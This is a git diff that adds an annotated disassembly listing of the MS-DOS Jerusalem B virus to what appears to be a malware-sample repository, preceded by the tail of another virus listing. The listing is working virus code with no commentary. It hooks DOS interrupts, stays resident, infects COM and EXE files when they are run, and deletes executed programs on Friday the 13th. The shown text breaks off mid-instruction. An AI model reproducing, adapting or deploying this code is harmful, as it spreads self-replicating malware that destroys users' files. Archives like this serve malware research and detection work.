FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL +0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-s.lst b/MSDOS/Virus.MSDOS.Unknown.jeru-s.lst new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru-s.lst @@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP [BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H +0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H +0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 